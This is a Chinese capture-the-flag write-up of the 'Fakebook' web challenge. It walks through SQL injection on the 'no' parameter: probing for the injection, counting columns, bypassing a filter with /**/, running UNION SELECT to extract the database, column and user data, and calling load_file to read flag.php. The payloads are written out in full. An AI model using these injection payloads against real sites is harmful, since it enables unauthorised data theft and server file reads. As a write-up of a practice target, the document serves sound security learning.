攻防世界-Fakebook

原题攻防世界-Fakebook_第1张图片

解题思路

        点击join就可以进行注册攻防世界-Fakebook_第2张图片

攻防世界-Fakebook_第3张图片

攻防世界-Fakebook_第4张图片

        username看起来是个超链,点击跳转攻防世界-Fakebook_第5张图片 

         在url里出现了no=1,看起来可以注入,改成no=1 and 1=2报错。本来想用sqlmap,可能是网速有问题,啥都没出来。no=1order by 5报错,一共有四列。按照以前的方法现在该看数据库名no=1 union select1,2,3,database(),但是不行。攻防世界-Fakebook_第6张图片

         网上大佬们的wp都提到了序列化,扫描目录还能看到flag.php在/var/www/html里面,并且使用/**/可以绕过,第二列回显。no=-1/**/union/**/select 1,database(),3,4#攻防世界-Fakebook_第7张图片

         数据库名字叫fakebook,看列名no=-1 /**/union /**/ select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#攻防世界-Fakebook_第8张图片

         查看data。no=-1%20/**/union%20/**/%20select%201,group_concat(data)%20,3,4%20from%20users#攻防世界-Fakebook_第9张图片

        原来反序列化在这里。用load_file函数尝试读取flag。

no=-1/**/union/**/select 1,load_file('/var/www/html/flag.php') ,3,4#,但是返回结果没什么东西。攻防世界-Fakebook_第10张图片查看源码攻防世界-Fakebook_第11张图片

 

 

 

         

 

你可能感兴趣的:(网络安全)